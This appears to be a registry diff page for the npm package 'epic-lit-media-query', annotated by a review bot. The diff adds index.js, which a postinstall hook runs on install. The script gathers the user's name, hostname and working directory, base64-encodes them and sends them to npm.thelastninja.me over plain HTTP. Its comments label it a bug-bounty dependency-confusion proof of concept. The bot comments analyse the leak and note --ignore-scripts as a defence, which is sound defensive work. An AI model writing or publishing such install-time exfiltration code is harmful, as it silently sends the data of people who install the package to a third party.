epic-lit-media-query 0.0.1-security → 2.0.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/index.js +33 -0
- package/package.json +19 -3
- package/README.md +0 -5
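--- /dev/null
+++ b/package/index.js
@@ -0,0 +1,33 @@
+const os = require('os');
+const http = require('http');
+
+// This is a proof-of-concept package that is part of a Bug Bounty compaign for Epic Games
+// Please note that this is not a malicious package, it is meant only as demonstration for dependency confusion
+// It collects username, hostname and current path and submits them to a remote server to demonstrate impact
+// For any inquiries please reach out to: thelastninja@wearehackerone.com
+
+async function sendUserInfoToLogging() {
+try {
+const userInfo = os.userInfo();
+const hostname = os.hostname();
+const currentPath = process.cwd();
+
+// Combine user and host information
+const userInfoString = `${userInfo.username}@${hostname}:${currentPath}`;
+
+// Base64 encode the combined string
+const encodedUserInfo = Buffer.from(userInfoString).toString('base64');
+
+// Construct the URL with encoded user information
+const url = `http://npm.thelastninja.me/logging?user_info=${encodedUserInfo}`;
+
+// Send a GET request to the logging endpoint
+const response = await http.get(url);
+
+} catch (error) {
+console.error('Error sending user info to logging:', error.message);
+}
+}
+
+// Call the function to send user info to logging
+sendUserInfoToLogging();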
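Review bot: `const response = await http.get(url);` (new line 25) awaits a ClientRequest, not a Promise, so the try/catch around it never observes request failures; a connection or DNS error is emitted as an 'error' event with no listener, which surfaces as an uncaught exception in the install run instead of reaching the console.error on line 28, and `response` is never used. Attaching an 'error' listener to the request, or wrapping the call in a Promise that rejects on that event, is what would make the catch block reachable. The base64 value on line 22 is also interpolated into the query string without `encodeURIComponent`, so `+`, `/` and `=` characters are not transported reliably. Read together with the `postinstall` hook in package.json, the effect on a consumer is that the local username, hostname and working directory are sent over cleartext HTTP to a third-party host at install time with no opt-out; `npm install --ignore-scripts` prevents the script from running, and an outbound connection from an installer process to this host is a useful detection signal.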
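--- a/package/package.json
+++ b/package/package.json
@@ -1,6 +1,22 @@
 {
 "name": "epic-lit-media-query",
-"version": "
-"description": "
-"
+"version": "2.0.1",
+"description": "This is a poc package for bug bounty dependency confusion test, it only collects basic info to demonstrate impact to the triage team",
+"main": "index.js",
+"scripts": {
+"test": "echo \"Error: no test specified\" && exit 1",
+"postinstall": "node index.js"
+},
+"repository": {},
+"keywords": [
+"poc"
+],
+"author": "thelastninja@wearehackerone.com",
+"license": "MIT",
+"bugs": {
+"url": "https://hackerone.com/thelastninja"
+},
+"homepage": "https://hackerone.com/thelastninja",
+"dependencies": {
+}
 }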
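Review bot: The `"postinstall": "node index.js"` hook added at new line 8 runs index.js automatically on every install of a dependent project, and nothing in the manifest warns a consumer before that happens — the description string on line 4 is the only notice, and it is not shown by the installer. Provenance cannot be checked from the manifest either: `"repository": {}` is empty and the only links are the `bugs`/`homepage` entries pointing at a bug-bounty profile. A consumer or CI pipeline that wants to stay unaffected can install with `--ignore-scripts`, and an allowlist of packages permitted to run lifecycle scripts is the usual longer-term control. The removed lines 3–5 appear truncated in this rendering (`"version": "` with no value), so the previous version string is not recoverable from this page.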
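--- a/package/README.md
+++ /dev/null
@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=epic-lit-media-query for more information.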